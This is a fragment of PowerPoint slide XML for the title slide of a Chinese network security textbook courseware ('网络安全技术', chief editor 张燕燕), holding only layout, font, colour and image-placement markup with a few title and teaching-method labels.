          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5634990" y="2847975"/>
            <a:ext cx="4752340" cy="3810"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="451485"/>
            <a:ext cx="4021455" cy="301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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>广东省首批十四五规划教材</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624705" y="5731510"/>
            <a:ext cx="2943225" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6736715" y="4239895"/>
            <a:ext cx="2548255" cy="56007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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>主编：张燕燕</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5238115" y="3315970"/>
            <a:ext cx="5756910" cy="3219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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>课程思政</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>岗课赛证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>项目式教学</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务驱动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" cap="all" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="蝴蝶结"/>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2184400" y="1409700"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="茶杯"/>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3098800" y="1409700"/>
            <a:ext cx="296545" cy="296545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="衣架"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId13"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4013200" y="1409700"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11" descr="新建文档"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId15"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="1791335"/>
            <a:ext cx="491490" cy="491490"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId17"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459355" y="3238500"/>
            <a:ext cx="492760" cy="492760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="图片 13" descr="箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId19"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2266315" y="1922145"/>
            <a:ext cx="408305" cy="408305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId20">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId21"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443355" y="1761490"/>
            <a:ext cx="562610" cy="562610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16" descr="线性数据图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId22">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId23"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1699260" y="3030855"/>
            <a:ext cx="401955" cy="401955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17" descr="饼图"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId25"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="3141980"/>
            <a:ext cx="495935" cy="495935"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="循环箭头"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId26">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId27"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523875" y="2791460"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21" descr="信"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId29"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2324100"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
